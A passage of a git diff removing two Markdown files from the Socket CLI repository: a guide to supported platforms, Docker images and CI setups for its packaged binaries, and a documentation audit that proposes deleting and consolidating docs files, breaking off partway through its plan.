- -## Supported Platforms - -The `pkg.json` configuration targets these platforms: - -```json -{ - "targets": [ - "node24-macos-arm64", // Apple Silicon Macs (M1/M2/M3/M4) - "node24-macos-x64", // Intel Macs - "node24-linux-arm64", // ARM64 Linux - "node24-linux-x64", // x86_64 Linux - "node24-win-arm64", // Windows on ARM - "node24-win-x64" // Windows x86_64 - ] -} -``` - -## Platform Details - -### macOS - -#### node24-macos-arm64 -- **Architecture:** Apple Silicon (ARM64) -- **Devices:** MacBook Pro/Air M1/M2/M3/M4, Mac Mini M1/M2/M4, Mac Studio, iMac M1/M3/M4 -- **Minimum OS:** macOS 13.5+ (Ventura) -- **Docker:** Not applicable (macOS doesn't run native Docker containers) - -#### node24-macos-x64 -- **Architecture:** Intel x86_64 -- **Devices:** Intel-based Macs (2010-2020) -- **Minimum OS:** macOS 13.5+ (Ventura) -- **Rosetta 2:** Can also run on Apple Silicon via Rosetta 2 translation -- **Docker:** Not applicable - -### Linux - -#### node24-linux-x64 ⭐ Most Common Docker Platform -- **Architecture:** x86_64 (AMD64) -- **OS:** Any modern Linux distribution - - Ubuntu 18.04+ - - Debian 10+ - - Alpine Linux 3.14+ - - Amazon Linux 2/2023 - - Red Hat Enterprise Linux 8+ - - CentOS 8+ - - Fedora 36+ -- **Glibc:** 2.27+ (Ubuntu 18.04+) -- **Musl:** Supported (Alpine Linux) -- **Docker:** ✅ **Most common Docker platform** - - `FROM ubuntu:22.04` - - `FROM node:24-alpine` - - `FROM node:24-bullseye` - - `FROM amazonlinux:2023` - - Standard `linux/amd64` architecture - -#### node24-linux-arm64 -- **Architecture:** ARM64 (aarch64) -- **OS:** Any modern ARM64 Linux distribution - - Ubuntu 18.04+ on ARM - - Debian 10+ on ARM - - Alpine Linux 3.14+ on ARM - - Amazon Linux 2023 (Graviton) -- **Devices/Platforms:** - - AWS EC2 Graviton instances (c7g, m7g, r7g, t4g series) - - AWS Lambda (Graviton2) - - Raspberry Pi 3/4/5 (64-bit OS) - - NVIDIA Jetson - - ARM-based servers (Ampere Altra, AWS Graviton) -- **Docker:** ✅ **Growing Docker platform** - - `FROM 
arm64v8/ubuntu:22.04` - - `FROM arm64v8/alpine:latest` - - `--platform linux/arm64` - - AWS Graviton containers - - Raspberry Pi containers - -### Windows - -#### node24-win-x64 -- **Architecture:** x86_64 (AMD64) -- **OS:** Windows 10+ (64-bit) -- **Minimum Version:** Windows 10 1903 (May 2019) or newer -- **Server:** Windows Server 2019+ -- **Docker:** Windows containers (rare for Node.js) - -#### node24-win-arm64 -- **Architecture:** ARM64 -- **Devices:** - - Surface Pro X - - Windows 11 on ARM - - Qualcomm Snapdragon-based PCs -- **OS:** Windows 11+ on ARM -- **Emulation:** Can run x64 binaries via emulation, but native ARM64 is faster -- **Docker:** Not common - ---- - -## Docker Compatibility - -### Primary Docker Targets - -Socket CLI pkg binaries are optimized for Docker containers: - -#### 1. linux-x64 (Most Common) - -**Standard Docker images:** -```dockerfile -# Ubuntu-based -FROM ubuntu:22.04 -COPY pkg-binaries/socket-linux-x64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Alpine-based (smaller) -FROM alpine:3.19 -COPY pkg-binaries/socket-linux-x64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Official Node.js image -FROM node:24-slim -COPY pkg-binaries/socket-linux-x64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket -``` - -**Works on:** -- ✅ Standard x86_64 servers (Intel/AMD) -- ✅ AWS EC2 (non-Graviton) -- ✅ Google Cloud Platform -- ✅ Azure VMs -- ✅ DigitalOcean -- ✅ Heroku -- ✅ Render -- ✅ Fly.io -- ✅ Most CI/CD platforms - -#### 2. 
linux-arm64 (AWS Graviton, ARM Servers) - -**Graviton-optimized images:** -```dockerfile -# Ubuntu ARM64 -FROM arm64v8/ubuntu:22.04 -COPY pkg-binaries/socket-linux-arm64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Alpine ARM64 -FROM arm64v8/alpine:3.19 -COPY pkg-binaries/socket-linux-arm64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Multi-arch build -FROM --platform=linux/arm64 node:24-slim -COPY pkg-binaries/socket-linux-arm64 /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket -``` - -**Works on:** -- ✅ AWS EC2 Graviton2/3/4 (c7g, m7g, r7g, t4g) -- ✅ AWS Lambda (ARM64) -- ✅ AWS Fargate (ARM64) -- ✅ Oracle Cloud Ampere A1 -- ✅ Raspberry Pi (64-bit OS) -- ✅ ARM-based Kubernetes clusters - -### Multi-Architecture Docker Images - -Build images that work on both x86_64 and ARM64: - -```dockerfile -# Dockerfile.multiarch -FROM --platform=$BUILDPLATFORM node:24-slim AS builder -ARG TARGETARCH - -# Copy appropriate binary based on architecture -COPY pkg-binaries/socket-linux-${TARGETARCH} /usr/local/bin/socket -RUN chmod +x /usr/local/bin/socket - -# Build multi-arch image -docker buildx build --platform linux/amd64,linux/arm64 -t myorg/socket:latest . 
-``` - -### Docker Compose Example - -```yaml -version: '3.8' -services: - socket-scanner: - image: ubuntu:22.04 - volumes: - - ./pkg-binaries/socket-linux-x64:/usr/local/bin/socket:ro - - ./project:/workspace - working_dir: /workspace - command: socket scan create --json - platform: linux/amd64 # or linux/arm64 -``` - ---- - -## Platform Testing - -### Test Each Platform Binary - -```bash -# macOS ARM64 (Apple Silicon) -./pkg-binaries/socket-macos-arm64 --version - -# macOS x64 (Intel) -./pkg-binaries/socket-macos-x64 --version - -# Linux x64 (Docker) -docker run --rm -v ./pkg-binaries:/bin ubuntu:22.04 /bin/socket-linux-x64 --version - -# Linux ARM64 (Docker) -docker run --rm --platform linux/arm64 -v ./pkg-binaries:/bin arm64v8/ubuntu:22.04 /bin/socket-linux-arm64 --version - -# Windows x64 -.\pkg-binaries\socket-win-x64.exe --version -``` - -### Verify Docker Compatibility - -```bash -# Test in Alpine (musl libc) -docker run --rm -v ./pkg-binaries:/app alpine:3.19 /app/socket-linux-x64 --version - -# Test in Ubuntu (glibc) -docker run --rm -v ./pkg-binaries:/app ubuntu:22.04 /app/socket-linux-x64 --version - -# Test in Debian -docker run --rm -v ./pkg-binaries:/app debian:12 /app/socket-linux-x64 --version - -# Test in Amazon Linux -docker run --rm -v ./pkg-binaries:/app amazonlinux:2023 /app/socket-linux-x64 --version -``` - ---- - -## Binary Sizes - -Expected binary sizes for each platform: - -| Platform | Approximate Size | Notes | -|----------|-----------------|-------| -| linux-x64 | ~90-110 MB | Most optimized | -| linux-arm64 | ~90-110 MB | Same as x64 | -| macos-arm64 | ~90-110 MB | Code-signed | -| macos-x64 | ~90-110 MB | Code-signed | -| win-x64 | ~95-115 MB | .exe format | -| win-arm64 | ~95-115 MB | .exe format | - -**Size breakdown:** -- Node.js runtime: ~82-85 MB (custom optimized build) -- Socket CLI code (bytecode): ~5-8 MB -- Assets (translations, requirements.json): ~1-2 MB -- Overhead (pkg metadata): ~2-5 MB - ---- - -## Cloud Platform 
Support - -### AWS - -#### x86_64 (Intel/AMD) -- ✅ EC2: t3, t2, m5, m6i, c5, c6i, r5, r6i -- ✅ Lambda: x86_64 runtime -- ✅ Fargate: x86_64 -- ✅ ECS: x86_64 - -#### ARM64 (Graviton) -- ✅ EC2: t4g, m7g, c7g, r7g (Graviton2/3/4) -- ✅ Lambda: arm64 runtime -- ✅ Fargate: arm64 -- ✅ ECS: arm64 - -### Google Cloud Platform - -- ✅ Compute Engine: x86_64 instances -- ✅ Cloud Run: x86_64 containers -- ✅ GKE: x86_64 nodes - -### Microsoft Azure - -- ✅ Virtual Machines: x86_64 -- ✅ Container Instances: x86_64 -- ✅ AKS: x86_64 nodes - -### Other Cloud Providers - -- ✅ DigitalOcean Droplets: x86_64 -- ✅ Linode: x86_64 -- ✅ Vultr: x86_64 -- ✅ Heroku: x86_64 -- ✅ Render: x86_64 -- ✅ Fly.io: x86_64 and arm64 - ---- - -## CI/CD Platform Support - -### GitHub Actions - -```yaml -strategy: - matrix: - os: [ubuntu-latest, macos-latest, windows-latest] - arch: [x64, arm64] - -steps: - - name: Test Socket CLI - run: | - chmod +x ./pkg-binaries/socket-${{ matrix.os }}-${{ matrix.arch }} - ./pkg-binaries/socket-${{ matrix.os }}-${{ matrix.arch }} --version -``` - -### GitLab CI - -```yaml -test:linux:x64: - image: ubuntu:22.04 - script: - - ./pkg-binaries/socket-linux-x64 --version - -test:linux:arm64: - image: arm64v8/ubuntu:22.04 - tags: - - arm64 - script: - - ./pkg-binaries/socket-linux-arm64 --version -``` - -### CircleCI - -```yaml -jobs: - test-linux: - docker: - - image: ubuntu:22.04 - steps: - - run: ./pkg-binaries/socket-linux-x64 --version - - test-macos: - macos: - xcode: "15.0" - steps: - - run: ./pkg-binaries/socket-macos-arm64 --version -``` - ---- - -## Libc Compatibility - -### glibc (Most Linux Distributions) - -Socket CLI binaries are built with: -- **Minimum glibc:** 2.27 (Ubuntu 18.04, Debian 10) -- **Compatible with:** - - Ubuntu 18.04+ - - Debian 10+ - - Red Hat Enterprise Linux 8+ - - CentOS 8+ - - Fedora 36+ - - Amazon Linux 2/2023 - -### musl libc (Alpine Linux) - -Socket CLI binaries work on musl-based distributions: -- ✅ Alpine Linux 3.14+ -- ✅ Alpine-based 
Docker images -- ✅ Lightweight containers - -**Note:** The same binary works on both glibc and musl systems because Node.js is statically compiled with all dependencies. - ---- - -## Cross-Platform Building - -### Building for All Platforms - -To build binaries for all platforms, you need: - -1. **Custom Node.js for each platform:** - - Build on native hardware, OR - - Use GitHub Actions matrix, OR - - Use Docker emulation (slow) - -2. **GitHub Actions workflow:** - -```yaml -name: Build pkg Binaries - -on: [push] - -jobs: - build: - strategy: - matrix: - include: - - os: ubuntu-latest - target: node24-linux-x64 - - os: ubuntu-latest - target: node24-linux-arm64 # Uses QEMU - - os: macos-13 - target: node24-macos-x64 - - os: macos-14 # M1 - target: node24-macos-arm64 - - os: windows-latest - target: node24-win-x64 - - runs-on: ${{ matrix.os }} - - steps: - - uses: actions/checkout@v4 - - - name: Set up QEMU (for ARM64) - if: matrix.target == 'node24-linux-arm64' - uses: docker/setup-qemu-action@v3 - - - name: Build custom Node.js - run: pnpm run build:yao-pkg:node - - - name: Build pkg binary - run: pnpm run build:yao-pkg - - - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.target }} - path: pkg-binaries/* -``` - ---- - -## Recommendations - -### For Desktop Users -- **macOS:** Use `socket-macos-arm64` (Apple Silicon) or `socket-macos-x64` (Intel) -- **Windows:** Use `socket-win-x64` (most common) -- **Linux:** Use `socket-linux-x64` (most common) - -### For Docker/Containers -- **Primary:** `socket-linux-x64` (99% of Docker hosts) -- **ARM/Graviton:** `socket-linux-arm64` (AWS Graviton, ARM servers) -- **Alpine:** Both `socket-linux-x64` and `socket-linux-arm64` work - -### For CI/CD -- **GitHub Actions:** `socket-linux-x64` (default runners) -- **GitLab CI:** `socket-linux-x64` (default runners) -- **CircleCI:** `socket-linux-x64` (default Linux executor) -- **AWS CodeBuild:** `socket-linux-x64` or `socket-linux-arm64` (Graviton) - -### For 
Cloud Deployments -- **AWS Lambda:** `socket-linux-x64` or `socket-linux-arm64` -- **AWS Fargate:** `socket-linux-x64` or `socket-linux-arm64` -- **Google Cloud Run:** `socket-linux-x64` -- **Azure Container Instances:** `socket-linux-x64` - ---- - -## Troubleshooting - -### "No such file or directory" on Linux - -**Cause:** Missing dynamic linker or wrong architecture. - -**Fix:** -```bash -# Check binary architecture -file pkg-binaries/socket-linux-x64 -# Should show: ELF 64-bit LSB executable, x86-64 - -# Verify you're on the right platform -uname -m -# Should show: x86_64 (for linux-x64) or aarch64 (for linux-arm64) -``` - -### "Cannot execute binary file: Exec format error" - -**Cause:** Wrong architecture (e.g., trying to run arm64 on x64). - -**Fix:** Use the correct binary for your platform. - -### "Permission denied" - -**Cause:** Binary not executable. - -**Fix:** -```bash -chmod +x pkg-binaries/socket-* -``` - ---- - -## Summary - -Socket CLI pkg binaries provide **maximum compatibility** across: - -- ✅ **Desktop platforms** (macOS, Windows, Linux) -- ✅ **Docker containers** (Ubuntu, Alpine, Debian, Amazon Linux) -- ✅ **Cloud platforms** (AWS, GCP, Azure, DigitalOcean) -- ✅ **ARM architecture** (Apple Silicon, AWS Graviton, Raspberry Pi) -- ✅ **x86_64 architecture** (Intel/AMD servers and desktops) -- ✅ **CI/CD platforms** (GitHub Actions, GitLab CI, CircleCI) - -The `node24-linux-x64` binary covers **99% of Docker use cases**, while `node24-linux-arm64` provides optimal performance on ARM-based infrastructure like AWS Graviton. diff --git a/docs/documentation-audit.md b/docs/documentation-audit.md deleted file mode 100644 index 087fb328b..000000000 --- a/docs/documentation-audit.md +++ /dev/null @@ -1,643 +0,0 @@ -# Socket CLI Documentation Audit Report -Generated: 2025-11-02 - ---- - -## EXECUTIVE SUMMARY - -The Socket CLI documentation is **well-organized** using a 3-tier hierarchy system as documented in `documentation-organization.md`. 
However, there are opportunities for consolidation, removal of deprecated files, and optimization of verbose sections. - -**Key Metrics:** -- **Total lines:** 12,862 across all `/docs/` files -- **Total size:** 412 KB -- **Markdown files in /docs/:** 31 files across 9 subdirectories -- **Package docs:** 40+ additional markdown files in packages/ -- **Deprecated files:** 1 (`.cacache-format-DEPRECATED.md`) - ---- - -## 1. COMPLETE FILE LISTING WITH LOCATIONS AND SIZES - -### Tier 1: Monorepo Documentation (`/docs/`) - -#### Root Documentation -- `/docs/README.md` - Main documentation index -- `/docs/documentation-organization.md` - 3-tier hierarchy guide (331 lines) -- `/docs/MONOREPO.md` - Monorepo structure overview (71 lines) - -#### Architecture (`/docs/architecture/`) -| File | Lines | Size | Purpose | -|------|-------|------|---------| -| `bootstrap-stub.md` | 650 | ~18KB | Bootstrap stub architecture | -| `repository.md` | 537 | ~16KB | Repository structure | -| `stub-execution.md` | 438 | ~13KB | Stub execution flow | -| `stub-package.md` | 389 | ~12KB | Stub package details | -| `unified-binary.md` | ? | ? | Unified binary design | - -#### Build System (`/docs/build/`) -| File | Lines | Size | Purpose | -|------|-------|------|---------| -| `README.md` | 367 | ~12KB | Build system overview (INDEX) | -| `build-dist-structure.md` | ? 
| ~5.4KB | Output directory structure | -| `caching-strategy.md` | 241 | ~7.5KB | Build caching mechanics | -| `node-build-order-explained.md` | 287 | ~8.0KB | Patch application order | -| `node-build-quick-reference.md` | 449 | ~10KB | Custom Node.js troubleshooting | -| `node-patch-creation-guide.md` | 562 | ~13KB | Socket patch creation | -| `node-patch-metadata.md` | 342 | ~8.8KB | Patch metadata format | -| `wasm-build-guide.md` | 352 | ~6.8KB | WASM compilation | - -#### Configuration (`/docs/configuration/`) -| File | Lines | Purpose | -|------|-------|---------| -| `configuration-migration.md` | 308 | Config migration guide | -| `configuration-summary.md` | 272 | Config overview | -| `shared-configuration-architecture.md` | 299 | Shared config architecture | - -#### Development (`/docs/development/`) -| File | Lines | Purpose | -|------|-------|---------| -| `getting-started.md` | 570 | New contributor onboarding | -| `babel-plugins.md` | 519 | Babel plugin documentation | -| `linking.md` | ? 
| Development linking setup | -| `platform-support.md` | 506 | Cross-platform support guide | - -#### Guides (`/docs/guides/`) -| File | Lines | Purpose | -|------|-------|---------| -| `testing-yao-pkg.md` | 278 | Testing yao-pkg binary | -| `yao-pkg-ci.md` | 483 | CI setup for yao-pkg | - -#### Performance (`/docs/performance/`) -| File | Lines | Purpose | -|------|-------|---------| -| `performance-build.md` | 403 | Build performance optimization | -| `performance-ci.md` | 406 | CI performance strategies | -| `performance-testing.md` | 536 | Test performance analysis | - -#### Technical (`/docs/technical/`) -| File | Lines | Status | Purpose | -|------|-------|--------|---------| -| `manifest-management.md` | 556 | Active | Manifest API reference | -| `manifest-extensions.md` | 475 | Active | Proposed future features | -| `metadata-files.md` | 233 | Active | Metadata file formats | -| `patch-cacache.md` | 366 | Active | Patch backup/caching | -| `.cacache-format-DEPRECATED.md` | 332 | **DEPRECATED** | Old cacache format (obsolete) | - -#### Testing (`/docs/testing/`) -| File | Lines | Purpose | -|------|-------|---------| -| `local-testing.md` | ? | Local test setup | -| `smart-test-selection.md` | 339 | Smart test selection | -| `testing-custom-node.md` | ? 
| Testing custom Node.js | - -### Tier 2: Package Documentation - -#### cli Package (`/packages/cli/`) -| File | Lines | Location | Status | -|------|-------|----------|--------| -| `README.md` | 44 | Short package intro | OK | -| `CHANGELOG.md` | 455 | Release history | OK | -| `docs/nlp-progressive-enhancement.md` | 271 | AI feature docs | Active | -| `src/commands/manifest/README.md` | 35 | Command docs | OK | -| `test/helpers/README.md` | 395 | Test helper docs | Active | -| `test/helpers/examples.md` | 780 | Test examples | Large | -| `test/helpers/sdk-testing.md` | 996 | SDK testing guide | Large | -| `test/integration/README.md` | 189 | Integration test docs | Active | -| `test/fixtures/commands/patch/README.md` | 123 | Test fixtures | Small | -| `.claude/python-dlx-refactor-plan.md` | 103 | **Workspace-local plan** | TODO file | - -#### node-smol-builder Package -| File | Lines | Purpose | -|------|-------|---------| -| `README.md` | ~66 | Package overview | -| `COMPRESSION-GUIDE.md` | ? | Compression guide | -| `docs/README.md` | ? | Docs index | -| `docs/binary-compression-distribution.md` | ? | Distribution strategy | -| `docs/compression-quick-start.md` | ? | Quick start | -| `docs/compression-test-results.md` | ? | Test results | -| `docs/self-extracting-binary-architecture.md` | ? | SEA architecture | -| `patches/README.md` | ? 
| Patches directory | - -#### sbom-generator Package -| File | Purpose | -|------|---------| -| `README.md` | Package overview | -| `docs/README.md` | Docs index | -| `docs/architecture.md` | Architecture | -| `docs/ecosystems.md` | Supported ecosystems | -| `docs/fidelity-analysis.md` | Fidelity analysis | -| `docs/implementation.md` | Implementation details | -| `docs/lock-step-compliance.md` | Compliance tracking | - -#### Other Packages with Docs -- `yoga-layout/` - WASM builder docs + research/ -- `onnxruntime/` - ONNX Runtime docs -- `node-sea-builder/` - SEA builder README -- `minilm-builder/` - ML model builder README -- `codet5-models-builder/` - Model builder README -- `build-infra/` - Build infrastructure README -- `cli-with-sentry/` - Sentry variant README -- `socket/` - Wrapper package README -- `socketbin-cli-*` (8 files) - Platform binary READMEs (identical stubs) - -### Platform Binary Package Stubs (`/packages/socketbin-cli-*`) -**Count:** 8 identical README files (one per platform) -- `socketbin-cli-darwin-arm64/README.md` -- `socketbin-cli-darwin-x64/README.md` -- `socketbin-cli-linux-arm64/README.md` -- `socketbin-cli-linux-x64/README.md` -- `socketbin-cli-alpine-arm64/README.md` -- `socketbin-cli-alpine-x64/README.md` -- `socketbin-cli-win32-arm64/README.md` -- `socketbin-cli-win32-x64/README.md` - -**Issue:** These are identical boilerplate READMEs - duplicated content - ---- - -## 2. DIRECTORIES TO DELETE - -### No `/tmp/` or `/archive/` Directories Found - -However, the following items should be considered for cleanup: - -#### A. Definitely Delete -1. **`.cacache-format-DEPRECATED.md`** - - Location: `/docs/technical/.cacache-format-DEPRECATED.md` - - Lines: 332 - - Status: Clearly marked DEPRECATED - - Reason: Implementation changed; metadata-based approach replaced it - - Safe to delete: Yes, replaced by `/docs/technical/metadata-files.md` and `/docs/technical/patch-cacache.md` - -2. 
**`.claude/python-dlx-refactor-plan.md`** - - Location: `/packages/cli/.claude/python-dlx-refactor-plan.md` - - Lines: 103 - - Status: Workspace-local development note - - Reason: Ephemeral planning document (should be in issues, not repo) - - Safe to delete: Yes, moves work tracking to GitHub issues - -#### B. Consider Consolidating -1. **Platform binary stubs** (8 nearly-identical README files) - - Locations: `/packages/socketbin-cli-{platform}-{arch}/README.md` - - Issue: 100% duplicate boilerplate - - Solution: Create shared template or reference in root docs - ---- - -## 3. DOCUMENTATION ISSUES - -### A. Deprecated Content (ACTIVE ISSUES) - -#### 1. `.cacache-format-DEPRECATED.md` - OBSOLETE -- **Problem:** 332-line document explaining old cacache format -- **Context:** This was replaced by metadata-based architecture (see `metadata-files.md`) -- **Evidence:** File literally named DEPRECATED -- **Impact:** May confuse developers if found during searches -- **Action:** Delete (safe - fully replaced) - -### B. Redundant/Verbose Documentation - -#### 1. Performance Documentation (3 files, 1,345 lines total) -- `performance-build.md` (403 lines) -- `performance-ci.md` (406 lines) -- `performance-testing.md` (536 lines) - -**Issue:** Excessive overlap and verbosity -- All three could be consolidated into single "Performance Guide" (500-600 lines) -- Much content is template-like (repeated headings, structure) -- Could be optimized by 40-50% - -#### 2. Configuration Documentation (3 files, 879 lines total) -- `configuration-summary.md` (272 lines) -- `configuration-migration.md` (308 lines) -- `shared-configuration-architecture.md` (299 lines) - -**Issue:** Unclear distinction between files -- `summary` vs `architecture` distinction unclear -- `migration` seems orthogonal; could be integrated into one file -- Candidates for consolidation into 2 files (600 lines) - -#### 3. 
Node Build Documentation (4 files, 1,640 lines total) -- `node-build-quick-reference.md` (449 lines) -- `node-patch-creation-guide.md` (562 lines) -- `node-patch-metadata.md` (342 lines) -- `node-build-order-explained.md` (287 lines) - -**Issue:** Very detailed, potentially over-documented -- 4 separate files for single concern (Node build system) -- Could consolidate to 2-3 files (1,200 lines) with clearer organization: - - "Node.js Build Guide" (combines all into cohesive flow) - - Quick reference stays separate - - Metadata format as appendix - -#### 4. CLI Test Documentation (3 files, 1,364 lines) -- `test/helpers/sdk-testing.md` (996 lines) -- `test/helpers/examples.md` (780 lines) -- `test/helpers/README.md` (395 lines) - -**Issue:** Excessively verbose for internal test utilities -- 996-line SDK testing guide is reference-level documentation -- 780-line examples file with 1 example section -- Could consolidate to 1-2 files (700-800 lines) - -#### 5. Build Architecture Documentation (4 files, 2,014 lines) -- `bootstrap-stub.md` (650 lines) -- `repository.md` (537 lines) -- `stub-execution.md` (438 lines) -- `stub-package.md` (389 lines) - -**Issue:** Stub/bootstrap architecture explained 4 ways -- Massive overlap in topics covered -- Could consolidate to 2 documents: - - "Stub Architecture Overview" (1,000 lines) - - "Bootstrap System Deep Dive" (500 lines) - -### C. Organization Issues - -#### 1. Missing Cross-Tier Links -- `/docs/build/README.md` references `build-toolchain-setup.md` which doesn't exist -- Some tier 2 docs lack back-references to tier 1 -- Yoga Layout research docs have no README index - -#### 2. Unindexed Documentation -- `/packages/yoga-layout/research/` has 3 markdown files but no README -- `/packages/cli/.claude/` contains work-in-progress (shouldn't be in source) -- `/packages/sbom-generator/` multiple docs but unclear entry point - -#### 3. 
Inconsistent Structure -- Some packages have `docs/README.md` index, others don't -- Mixed capitalization in filenames (no consistent pattern) -- Some packages have multiple orphaned markdown files - -### D. Outdated References - -#### 1. Missing Documentation References -- `docs/build/README.md` line 209 references `build-toolchain-setup.md` - **NOT FOUND** -- Should either create this file or remove reference - -#### 2. Configuration Documentation Unclear -- 3 separate config files seem to overlap heavily -- User won't know which to read first -- No clear hierarchy - ---- - -## 4. REDUNDANCY ANALYSIS - -### High Redundancy (Direct Duplication) - -#### Platform Binary Stubs (8 files - 100% identical) -``` -/packages/socketbin-cli-darwin-arm64/README.md -/packages/socketbin-cli-darwin-x64/README.md -/packages/socketbin-cli-linux-arm64/README.md -/packages/socketbin-cli-linux-x64/README.md -/packages/socketbin-cli-alpine-arm64/README.md -/packages/socketbin-cli-alpine-x64/README.md -/packages/socketbin-cli-win32-arm64/README.md -/packages/socketbin-cli-win32-x64/README.md -``` - -**Issue:** These are generated packages with boilerplate READMEs -**Solution:** Use shared template or symlink - -### Medium Redundancy (Significant Overlap) - -| Files | Overlap | % | Consolidation Opportunity | -|-------|---------|---|--------------------------| -| Performance docs (3) | Build/test/CI perf | 40-50% | 1 comprehensive guide | -| Config docs (3) | Architecture/summary | 30-40% | 2 files max | -| Node build docs (4) | Patch creation/metadata | 35-45% | 2 files + quick ref | -| Stub architecture (4) | Bootstrap/stub flow | 45-55% | 2 comprehensive guides | -| CLI test docs (3) | Testing patterns | 35-40% | 1-2 files | - -### Documentation-to-Code Ratio -- 412 KB docs / ~2 GB codebase = 0.02% ratio (reasonable) -- 12,862 lines docs / ~200K lines code = 6.4% ratio (acceptable) - ---- - -## 5. 
DOCUMENTATION THAT NEEDS CONSOLIDATION - -### Priority 1: CRITICAL (Delete Immediately) - -1. **`.cacache-format-DEPRECATED.md`** (332 lines) - - Action: DELETE - - Reason: Clearly deprecated, replaced by metadata approach - - Saves: 332 lines - -2. **`.claude/python-dlx-refactor-plan.md`** (103 lines) - - Action: DELETE or MOVE to GitHub Issue - - Reason: Ephemeral development plan, shouldn't be in repo - - Saves: 103 lines - -### Priority 2: CONSOLIDATE (Same level of importance) - -#### Set A: Build Architecture (4 files → 2 files, saves 300-400 lines) -**Current:** -- `docs/architecture/bootstrap-stub.md` (650 lines) -- `docs/architecture/repository.md` (537 lines) -- `docs/architecture/stub-execution.md` (438 lines) -- `docs/architecture/stub-package.md` (389 lines) -- **Total: 2,014 lines** - -**Proposed:** -- `docs/architecture/stub-system-overview.md` (~900-1000 lines) - - What is stub/bootstrap system - - Package structure - - Execution flow - - Repository integration -- `docs/architecture/stub-deep-dive.md` (~400-500 lines) - - Low-level details - - Implementation specifics - - Internals for maintainers -- **New total: 1,300-1,500 lines** (Savings: 500-700 lines) - -**Rationale:** These 4 documents repeat the same core concepts from different angles. A narrative flow document + detailed reference works better. 
- -#### Set B: Node.js Build Documentation (4 files → 2 files, saves 400-500 lines) -**Current:** -- `docs/build/node-build-quick-reference.md` (449 lines) -- `docs/build/node-patch-creation-guide.md` (562 lines) -- `docs/build/node-patch-metadata.md` (342 lines) -- `docs/build/node-build-order-explained.md` (287 lines) -- **Total: 1,640 lines** - -**Proposed:** -- `docs/build/node-build-system.md` (~1,000-1,200 lines) - - Complete building Node.js from source - - Patch creation workflow - - Patch metadata structure - - Patch application order -- `docs/build/node-build-quick-reference.md` (~300 lines) - - Keep as-is for quick lookup -- **New total: 1,300-1,500 lines** (Savings: 140-340 lines) - -**Rationale:** "Order explained", "creation guide", and "metadata" are all prerequisites for understanding patches. A single comprehensive guide followed by quick reference is clearer. - -#### Set C: Configuration Documentation (3 files → 2 files, saves 150-200 lines) -**Current:** -- `docs/configuration/configuration-summary.md` (272 lines) -- `docs/configuration/shared-configuration-architecture.md` (299 lines) -- `docs/configuration/configuration-migration.md` (308 lines) -- **Total: 879 lines** - -**Proposed:** -- `docs/configuration/configuration-guide.md` (~600-700 lines) - - Architecture first - - Summary of all options - - Migration guide as section -- **New total: 600-700 lines** (Savings: 179-279 lines) - -**Rationale:** These files blur together. A single guide with sections is clearer than 3 separate files. 
- -#### Set D: Performance Documentation (3 files → 1 file, saves 400-500 lines) -**Current:** -- `docs/performance/performance-build.md` (403 lines) -- `docs/performance/performance-ci.md` (406 lines) -- `docs/performance/performance-testing.md` (536 lines) -- **Total: 1,345 lines** - -**Proposed:** -- `docs/performance/performance-optimization-guide.md` (~700-850 lines) - - Build performance - - Test performance - - CI performance - - Shared principles throughout -- **New total: 700-850 lines** (Savings: 495-645 lines) - -**Rationale:** All three files cover the same optimization principles applied to different subsystems. One comprehensive guide is more efficient. - -#### Set E: CLI Test Documentation (3 files → 2 files, saves 300-400 lines) -**Current:** -- `packages/cli/test/helpers/README.md` (395 lines) -- `packages/cli/test/helpers/sdk-testing.md` (996 lines) -- `packages/cli/test/helpers/examples.md` (780 lines) -- **Total: 2,171 lines** - -**Proposed:** -- `packages/cli/test/helpers/README.md` (~400 lines) - - Overview + quick start (keep as index) -- `packages/cli/test/helpers/testing-guide.md` (~1,100-1,200 lines) - - SDK testing patterns - - Examples integrated into patterns - - Best practices -- **New total: 1,500-1,600 lines** (Savings: 571-671 lines) - -**Rationale:** Examples should illustrate patterns, not be separate. Consolidate into cohesive guide. 
- -### Priority 3: ORGANIZE (Better Structure, No Deletion) - -#### Platform Binary Stubs (8 files → 1 shared template) -**Action:** -- Create: `docs/build/platform-binary-packages.md` -- Remove: Individual platform README duplication -- Solution: - - Symlink or reference template for all 8 platform packages - - Or generate from single source - -**Savings:** Remove 7 redundant files (but not critical - they're tiny) - -#### Unindexed Package Docs -**Action:** -- Add README.md to `/packages/yoga-layout/research/` (currently 3 orphaned docs) -- Verify all package `docs/` folders have index files -- Create missing indices for `/packages/sbom-generator/docs/` - ---- - -## 6. CONSOLIDATION RECOMMENDATIONS SUMMARY - -### Consolidation Plan (by priority) - -#### Phase 1: Immediate Cleanup (Low Risk) -**Action:** Delete these files safely -1. `/docs/technical/.cacache-format-DEPRECATED.md` (332 lines) -2. `/packages/cli/.claude/python-dlx-refactor-plan.md` (103 lines) - -**Impact:** Remove obsolete content, clean up workspace -**Effort:** 5 minutes -**Risk:** None - content is replaced or is ephemeral - -#### Phase 2: High-Impact Consolidations (Medium Risk) -**Consolidate (in this order, as each builds on previous):** - -1. **Performance Documentation** (1,345 lines → 700-850 lines) - - Effort: 2-3 hours - - Risk: Low - similar content across files - - Saves: 495-645 lines - -2. **Configuration Documentation** (879 lines → 600-700 lines) - - Effort: 1-2 hours - - Risk: Low - clear distinction between files unclear - - Saves: 179-279 lines - -3. **Node.js Build Documentation** (1,640 lines → 1,300-1,500 lines) - - Effort: 3-4 hours - - Risk: Medium - complex topic, must preserve accuracy - - Saves: 140-340 lines - -#### Phase 3: Architectural Consolidations (Higher Risk) -**Consolidate only if Phase 2 successful:** - -1. 
